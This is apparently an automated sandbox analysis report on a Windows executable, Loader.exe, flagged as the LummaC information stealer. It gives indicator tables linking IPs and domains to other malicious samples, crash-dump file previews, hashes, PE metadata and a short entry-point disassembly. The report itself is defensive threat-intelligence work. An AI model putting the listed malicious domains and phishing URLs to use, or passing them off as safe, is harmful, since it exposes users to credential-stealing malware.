                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                    • Number of non-executed functions: 9
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.53.18, 172.202.163.200, 13.107.246.63, 4.245.163.56
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                    • Execution Graph export aborted for target Loader.exe, PID 4308 because there are no executed function
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • VT rate limit hit for: Loader.exe
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    12:52:06API Interceptor8x Sleep call for process: Loader.exe modified
                                                                                                                                                                                    12:52:45API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    104.21.22.222Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                        http://gerxx.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                            • redroomaudio.com/administrator/index.php
                                                                                                                                                                                            23.55.153.106SET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    ro7MnkIxJk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      hQ3bNN05F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        FtbY5uqGY0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          x1e7BlMmbl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            8E273IHyAW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                immureprech.bizIFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                QnNRjhoN.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                infrarecorder.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                brendon-sharjen.bizvPqd8HLs88.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 172.67.130.33
                                                                                                                                                                                                                steamcommunity.comSET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                ro7MnkIxJk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                hQ3bNN05F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                FtbY5uqGY0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                x1e7BlMmbl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                8E273IHyAW.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                PHuHRcCpaJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.121.10.34
                                                                                                                                                                                                                deafeninggeh.bizIFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.80.1
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.112.1
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.16.1
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 104.21.66.63
                                                                                                                                                                                                                https://sunnycloudtechnologies.com/suncn/msd.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                https://newsystem-upgrade-securitycheck.b-cdn.net/verify-human.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                • 172.67.177.134
                                                                                                                                                                                                                file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • 172.67.19.24
                                                                                                                                                                                                                IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.80.1
                                                                                                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                • 104.21.67.152
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.50.161
                                                                                                                                                                                                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.67.213.90
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                AKAMAI-ASN1EUSET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                • 172.234.222.138
                                                                                                                                                                                                                elitebotnet.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                • 23.38.73.255
                                                                                                                                                                                                                http://sourceforge.net/projects/nircmd/files/nircmd-x64.zip/downloadGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 104.116.245.49
                                                                                                                                                                                                                jade.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 95.100.100.172
                                                                                                                                                                                                                jade.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 95.100.100.178
                                                                                                                                                                                                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 23.198.104.134
                                                                                                                                                                                                                CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 104.21.66.63
                                                                                                                                                                                                                https://sunnycloudtechnologies.com/suncn/msd.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                https://newsystem-upgrade-securitycheck.b-cdn.net/verify-human.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                • 172.67.177.134
                                                                                                                                                                                                                file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                • 172.67.19.24
                                                                                                                                                                                                                IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.80.1
                                                                                                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                • 104.21.67.152
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 104.21.50.161
                                                                                                                                                                                                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly95NE81LnN0YXJ5bm91c2UucnUvdDV2My8=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 172.67.213.90
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 172.67.207.38
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1SET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                IFTM0g0NWX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                MessengerAdmin.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                RedBull [YouTube Partneships].exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                BDxsBr8Dce.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                zA6ym8lbRp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                ClipMon.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                • 104.21.22.222
                                                                                                                                                                                                                • 104.21.32.1
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                Entropy (8bit):0.932468349252479
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:hFL5OHasUh1od7Rr6tQXIDcQqc6mcEKcw34es+HbHg/opAnQk3dDDWpsjOyWMmdv:jLWaK0kigMqjpy1zuiFJJZ24IO8Ch8
                                                                                                                                                                                                                MD5:5B18211FF58272D45AADB1A0002583E8
                                                                                                                                                                                                                SHA1:7F175FA8AA62D8CC8F5FF1B5F48677478E14F7EF
                                                                                                                                                                                                                SHA-256:CF7C1A0F6E6517EC287853CB22E371D5F63FC2F76C59790ECCA5BB86DAABA310
                                                                                                                                                                                                                SHA-512:33448F4B465F15B0A04027C3B0CA8BF09FB4F1D81D9724151F5F3CA1D7A7DDE558AC94090DCE94B54CF329424204C0538052F05D438E8DCAE1578BFAA598D0E4
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.8.5.9.3.6.7.8.3.5.3.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.8.5.9.3.7.8.3.0.4.2.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.0.e.4.2.8.5.-.c.b.f.1.-.4.2.9.2.-.9.c.5.3.-.3.7.6.a.5.0.7.8.d.0.c.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.7.b.a.1.d.6.-.1.f.7.e.-.4.0.2.6.-.8.2.3.6.-.d.3.c.4.8.c.1.f.0.d.6.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.a.d.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.d.4.-.0.0.0.1.-.0.0.1.4.-.0.2.5.7.-.8.5.b.7.8.7.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.2.2.0.c.a.c.8.c.b.c.f.c.a.5.d.8.8.6.9.f.1.4.9.f.7.b.7.9.e.b.0.0.0.0.f.f.f.f.!.0.0.0.0.b.2.5.e.c.3.d.0.9.4.3.e.1.7.e.d.9.9.7.b.3.5.3.8.6.5.f.3.c.e.b.2.4.a.4.9.8.1.9.3.!.L.o.a.d.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2./.
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Fri Dec 13 17:52:16 2024, 0x1205a4 type
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48422
                                                                                                                                                                                                                Entropy (8bit):2.7166422131343917
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:6Vh62XaSg77zOeBG15XgYF4R5zLxbcdLrd3i2GiGVNfNucV6zeqcHsOX:ggSg77qeBG15X+LsPoxocY4tX
                                                                                                                                                                                                                MD5:50CFF0A2C0F25B99C49DD3757CFD85DF
                                                                                                                                                                                                                SHA1:86EC05970746A08A32B3097A6D1F9E00F0024DCE
                                                                                                                                                                                                                SHA-256:31C18CA80FB8536191FFC1E8337720B1E76CD0D64038E7E26CFCBA234BBDC336
                                                                                                                                                                                                                SHA-512:A1B012BE41ED4A31B2D5F237B23DB6F438941EB3ED27B3EC5786E439ED87BE55F8B1169FB5269F23A0BD3C034A18532E9D37300733BC8C22868F091333F280BA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:MDMP..a..... .......Pt\g............4...........D...H...................t....+..........`.......8...........T...........x=..............p...........\...............................................................................eJ..............GenuineIntel............T...........Ct\g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8408
                                                                                                                                                                                                                Entropy (8bit):3.694965436090411
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJvb6f6Y9bSU96mgmfk4bQpDM89bAdsfjAm:R6lXJz6f6YRSU96mgmfkXAWfR
                                                                                                                                                                                                                MD5:017E97569F715FFB6A6457F1203A0417
                                                                                                                                                                                                                SHA1:EEC2F34557F37F462897DC6A130522E5DBE8C270
                                                                                                                                                                                                                SHA-256:428D480042D26E8EAFF1483C8A66BAA4CA0E92D3E99ED2A0359C68EC4A045208
                                                                                                                                                                                                                SHA-512:6FCD830207AB5072D14F6854AD51D29A27309E4C7B77F5FAFECF247C357BF2C036645E6784D34B23E42D93AE9C517D331A4BD65522E31AE805FD1E97BFB2533E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.<./.P.i.
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4704
                                                                                                                                                                                                                Entropy (8bit):4.46346567261658
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsWJg77aI9XEWpW8VYaBJYm8M4JMFO3Fy2+q8vMFOVcMpbad:uIjfsI79d7VfYJ4mK4Icmbad
                                                                                                                                                                                                                MD5:D300D635BF5B996C49FFBC00DE45D54F
                                                                                                                                                                                                                SHA1:440E17E05925683998EDF9D619C0CA9E1662CCE2
                                                                                                                                                                                                                SHA-256:5190CC7A5601538CC32FAB2B999368EFE0B4ABBA1F4278051DC2768D09D386DC
                                                                                                                                                                                                                SHA-512:FE69139ED9FD857CAE6BE7AF0A51DCFABCC5AC48A7F922D68CB2E84AA453CFD1F21AA88BA68B0514B067CAD35F6BEE06E06B2ABD4BCF4A8BDC719E0343CFF4F0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629814" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                Entropy (8bit):4.465380376607642
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNudwBCswSbZ:zXD94+WlLZMM6YFHA+Z
                                                                                                                                                                                                                MD5:5AD0B4CE838E3A7BF8DC6C78B9B627C9
                                                                                                                                                                                                                SHA1:0C72CFD720197F8B03B1DC4B7E727BFB6073AD2E
                                                                                                                                                                                                                SHA-256:EB5826E350E9569113080321FEA3A590669A4B28EC773275A4E766B2AB8CFAD0
                                                                                                                                                                                                                SHA-512:D12C71735E66EE205928C3B42E090B749602179511D79D301B3B42FC6F9DAFA861BCB8BC8C78278B50CFD3C73AE06C61EFE38968943B4C83B2C36B4DDF090CEC
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...M...............................................................................................................................................................................................................................................................................................................................................>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                Entropy (8bit):6.000575547048131
                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                File name:Loader.exe
                                                                                                                                                                                                                File size:392'704 bytes
                                                                                                                                                                                                                MD5:55f7f34a571a52caefb86f49f0246390
                                                                                                                                                                                                                SHA1:b25ec3d0943e17ed997b353865f3ceb24a498193
                                                                                                                                                                                                                SHA256:81e2acbd26c2d3dcfba65fdff1c91d0927bfbb5f9d7c923184c97af4edda63f1
                                                                                                                                                                                                                SHA512:9da4bcc4de574361a37c1c7bd08f8fa12270dd62937243b49e859573ebb1e8f909afe35345075c549bb677edd179a8aac15f5cd0f9e75813da994fe0151b1f7f
                                                                                                                                                                                                                SSDEEP:6144:h+LPxYP6xpZN1zyP24L2SF36+s9cGtIGg8blO5W:gTxFZN1zyPxKSZ89VIGgelh
                                                                                                                                                                                                                TLSH:7E84F120BAE0C032D8575934D930D6B07E7F783217A6CA9F37A8477E2E706C25B66356
                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F...F...F.......F.......F.......F.......F...F...F.......F.......F.......F..Rich.F..........PE..L...t..d.................^.
                                                                                                                                                                                                                Icon Hash:63396de971436e0f
                                                                                                                                                                                                                Entrypoint:0x40447f
                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                Time Stamp:0x64E0C874 [Sat Aug 19 13:49:40 2023 UTC]
                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                Import Hash:c55ba1570e0a8d1efaf9700a357312b9
                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                call 00007F8F18EEC45Eh
                                                                                                                                                                                                                jmp 00007F8F18EE7E2Eh
                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                mov esi, ecx
                                                                                                                                                                                                                call 00007F8F18EEC4DEh
                                                                                                                                                                                                                mov dword ptr [esi], 00401244h
                                                                                                                                                                                                                mov eax, esi
                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                retn 0004h
                                                                                                                                                                                                                mov dword ptr [ecx], 00401244h
                                                                                                                                                                                                                jmp 00007F8F18EEC576h
                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                mov esi, ecx
                                                                                                                                                                                                                mov dword ptr [esi], 00401244h
                                                                                                                                                                                                                call 00007F8F18EEC563h
                                                                                                                                                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                                                je 00007F8F18EE7FB9h
                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                call 00007F8F18EE7829h
                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                mov eax, esi
                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                retn 0004h
